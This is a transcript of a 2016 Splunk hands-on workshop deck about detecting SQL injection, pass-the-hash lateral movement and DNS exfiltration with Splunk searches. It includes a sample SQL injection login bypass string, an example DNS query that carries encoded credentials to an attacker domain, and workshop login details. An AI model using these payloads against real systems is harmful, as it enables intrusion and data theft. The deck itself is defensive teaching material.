Splunk Enterpise for Information Security Hands-On

Copyright © 2016 Splunk Inc.

Splunk Enterprise for Information Security

Hands-On

Presenter: Rene Aguero

2

Security Hands-on: Find the first letter of *last* nameA – 1B – 1C – 1D – 2E – 2F – 2G – 3H – 3I – 3

J – 4K – 4L – 4M – 5N – 5O – 5P – 6Q – 6R – 6

S – 7T – 7U – 7V – 8W – 8X – 9Y – 9Z – 9? – 10

SSID: attwifi Code: Splunk2016https://od-sl-charlotte0#.splunkoxygen.com/ Username: splunklive

Password: security


Intro

4

Agenda

Intro

Web Attacks

Lateral Movement

DNS Exfiltration

Wrap-up / Q&A

5


J – 4K – 4L – 4M – 5N – 5O – 5P – 6Q – 6R – 6

S – 7T – 7U – 7V – 8W – 8X – 9Y – 9Z – 9? – 10


Password: security

Machine data contains a definitive record of all interactions

Splunk is a very effective platform to collect, store, and analyze all of that data

Human Machine

Machine Machine

Platform for Operational Intelligence

The Splunk Portfolio

Rich Ecosystem ofApps & Add-Ons

Splunk PremiumSolutions

MainframeData

RelationalDatabasesMobileForwarders Syslog/TCP IoT

DevicesNetworkWire Data

Hadoop

https://od-sl-charlotte10.splunkoxygen.com/

8

Rapid Ascent in the Gartner SIEM Magic Quadrant*

*Gartner, Inc., SIEM Magic Quadrant 2011-2015. Gartner does not endorse any vendor, product or service depicted in its research publication and not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, express or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

2015 Leader and the only vendor to improve its visionary position

2014 Leader

2013 Leader

2012 Challenger

2011 Niche Player

2015

9


J – 4K – 4L – 4M – 5N – 5O – 5P – 6Q – 6R – 6

S – 7T – 7U – 7V – 8W – 8X – 9Y – 9Z – 9? – 10


Password: security


Web Attacks

11

OWASP 2013 Top 10 [10] Unvalidated redirects and forwards [9] Using components with known vulnerabilities [8] Cross-site request forgery [7] Missing function level access control [6] Sensitive data exposure [5] Security misconfiguration [4] Insecure direct object reference [3] Cross-site scripting (XSS) [2] Broken authentication and session management

12

[1] InjectionSQL injectionCode injectionOS commandingLDAP injectionXML injectionXPath injectionSSI injectionIMAP/SMTP injectionBuffer overflow

13

Our focusSQL injectionCode injectionOS commandingLDAP injectionXML injectionXPath injectionSSI injectionIMAP/SMTP injectionBuffer overflow

SQL injection is a massive headache for all companies who have a database and a

web interface.

14

The anatomy of a SQL injection attack

SELECT * FROM users WHERE email='[email protected]' OR 1 = 1 -- ' AND password='xxx';

[email protected]' OR 1 = 1 -- '

xxx

[email protected]

1234

An attacker might supply:

https://od-sl-charlotte10.splunkoxygen.com/

15

Simple SQL Injection

index=web_vuln password select

(Starting with a simple, full-text search)

17

Simple SQL Injection

index=web_vuln password select (administrator OR root OR system OR sa) | iplocation clientip | search Country=Ukraine

(Furthermore, search for a privileged user and isolate the traffic from a specific country)

19

https://splunkbase.splunk.com/app/1528/

Search for possible SQL injection in your events: looks for patterns in URI query field to see if

anyone has injected them with SQL statements

use standard deviations that are 2.5 times greater than the average length of your URI query field

Macros used• sqlinjection_pattern(sourcetype, uri query field)• sqlinjection_stats(sourcetype, uri query field)

20

Advanced SQL Injection

index=web_vuln …

TIP: To decode URIs you can use: | eval u = urldecode(field)

21

Advanced SQL Injection

index=web_vuln | rex field=uri `sqlinjection_rex`| search injection=*| stats count by clientip status

24

Summary: Web attacks/SQL injectionSQL injection provide attackers with easy access to dataDetecting advanced SQL injection is hard – use an app!Augment your WAF with enterprise-wide Splunk searches

Other scenarios? Come see us at the Security Answers Booth


Lateral Movement

26

Poking around

An attacker hacks a non-privileged user system.

So what?

27

Lateral Movement

Lateral Movement is the expansion of systems controlled, and data accessed.

28

Most famous Lateral Movement attack?(excluding password re-use)

Pass the Hash!

29

Detecting Legacy PtHLook for Windows Events:

Event ID: 4624 or 4625Logon type: 3Auth package: NTLMUser account is not a domain logon, or Anonymous Logon

30

LM Detection: Pass the Hash

source=WinEventLog:Security EventCode=4624 Authentication_Package=NTLM Type=Information

32

Then it got harder• Pass the Hash tools have improved • Tracking of jitter, other metrics• So let’s detect lateral movement differently

33

Network traffic provides source of truthI usually talk to 10 hostsThen one day I talk to 10,000 hostsALARM!

34

LM Detection: Network Destinations

sourcetype="pan:traffic" | stats count dc(dest) sparkline(dc(dest)) by src_ip

35

Consistently large

Inconsistent!

36

LM Detection: Network Destinations

sourcetype="pan:traffic" | bucket _time span=1d | stats count dc(dest) as NumDests by src_ip _time | stats avg(NumDests) as avg stdev(NumDests) as stdev latest(NumDests) as latest by src_ip | where latest > 2 * stdev + avg

Find daily average, standard deviation, and most recent

38

LM Detection: Network Destinations – Bonus

… | stats avg( eval( if(_time < relative_time(now(), “-1d@d”), NumDests, null))) as avg ….

If you are fancy, use stats, eval and the relative_time functions to ignore our recent spike.

With a valid avg and stdev, yesterday’s value becomes 28 standard deviations away from normal!

39

iz so hard… u haz magic?

40

Summary: Lateral MovementAttacker success defines scope of a breachHigh difficulty, high importanceWorth doing in SplunkEasy with UBA


DNS Exfiltration

42

DNS exfiltration

domain=corp;user=dave;password=12345

encrypt

DNS Query:ZG9tYWluPWNvcnA7dXNlcj1kYXZlO3Bhc3N3b3JkPTEyMzQ1DQoNCg==.attack.com

ZG9tYWluPWNvcnA7dXNlcj1kYXZlO3Bhc3N3b3JkPTEyMzQ1DQoNCg==

43

DNS exfil tends to be overlooked within an ocean of DNS data.

Let’s fix that!

DNS exfiltration

44

FrameworkPOS: a card-stealing program that exfiltrates data from the target’s network by transmitting it as domain name system (DNS) traffic

But the big difference is the way how stolen data is exfiltrated: the malware used DNS requests!

https://blog.gdatasoftware.com/2014/10/23942-new-frameworkpos-variant-exfiltrates-data-via-dns-requests

“”

… few organizations actually keep detailed logs or records of the DNS traffic traversing their networks — making it an ideal way to siphon data from a hacked network.

http://krebsonsecurity.com/2015/05/deconstructing-the-2014-sally-beauty-breach/#

more-30872

“”

DNS exfiltration





http://krebsonsecurity.com/2015/05/deconstructing-the-2014-sally-beauty-breach/%23more-30872




45

https://splunkbase.splunk.com/app/2734/

DNS exfil detection – tricks of the trade parse URLs & complicated TLDs (Top Level Domain) calculate Shannon Entropy

List of provided lookups• ut_parse_simple(url)• ut_parse(url, list) or ut_parse_extended(url, list) • ut_shannon(word)• ut_countset(word, set)• ut_suites(word, sets)• ut_meaning(word)• ut_bayesian(word)• ut_levenshtein(word1, word2)

46

Examples• The domain aaaaa.com has a Shannon Entropy score of 1.8 (very low)• The domain google.com has a Shannon Entropy score of 2.6 (rather low)• A00wlkj—(-a.aslkn-C.a.2.sk.esasdfasf1111)-890209uC.4.com has a

Shannon Entropy score of 3 (rather high)

Layman’s definition: a score reflecting the randomness or measure of uncertainty of a string

Shannon Entropy

47

Detecting Data Exfiltration

index=bro sourcetype=bro_dns| `ut_parse(query)` | `ut_shannon(ut_subdomain)` | eval sublen = length(ut_subdomain) | table ut_domain ut_subdomain ut_shannon sublen

TIPS Leverage our Bro DNS data Calculate Shannon Entropy scores Calculate subdomain length Display Details

49


… | stats count avg(ut_shannon) as avg_sha avg(sublen) as avg_sublen stdev(sublen) as stdev_sublen by ut_domain | search avg_sha>3 avg_sublen>20 stdev_sublen<2

TIPS Leverage our Bro DNS data Calculate Shannon Entropy scores Calculate subdomain length Display count, scores, lengths,

deviations

50


RESULTS• Exfiltrating data requires many DNS requests – look for high counts• DNS exfiltration to mooo.com and chickenkiller.com

51

Summary: DNS exfiltrationExfiltration by DNS and ICMP is a very common techniqueMany organizations do not analyze DNS activity – do not be like them!No DNS logs? No Splunk Stream? Look at FW byte counts


Wrap-up / Q&A

53

SummaryMultiple phases to modern attacksDeploy detection across all phasesAlso consider adaptive response!Stay abreast of modern advancements

54

Northern Cal Tech Talks!Monthly WebEx Sessions

– Ted Talk style presentation– Q&A chat forum

So what’s next on the agenda?– April 20th @ 10AM PST

Top 5 most useful search commands

http://live.splunk.com/NorCalTechTalks

55

SEPT 26-29, 2016WALT DISNEY WORLD, ORLANDOSWAN AND DOLPHIN RESORTS

• 5000+ IT & Business Professionals• 3 days of technical content• 165+ sessions • 80+ Customer Speakers• 35+ Apps in Splunk Apps Showcase• 75+ Technology Partners• 1:1 networking: Ask The Experts and Security

Experts, Birds of a Feather and Chalk Talks• NEW hands-on labs! • Expanded show floor, Dashboards Control

Room & Clinic, and MORE!

The 7th Annual Splunk Worldwide Users’ Conference

PLUS Splunk University• Three days: Sept 24-26, 2016• Get Splunk Certified for FREE!• Get CPE credits for CISSP, CAP, SSCP• Save thousands on Splunk education!

THANK YOU

Splunk Enterpise for Information Security Hands-On

Technology

Transcript of Splunk Enterpise for Information Security Hands-On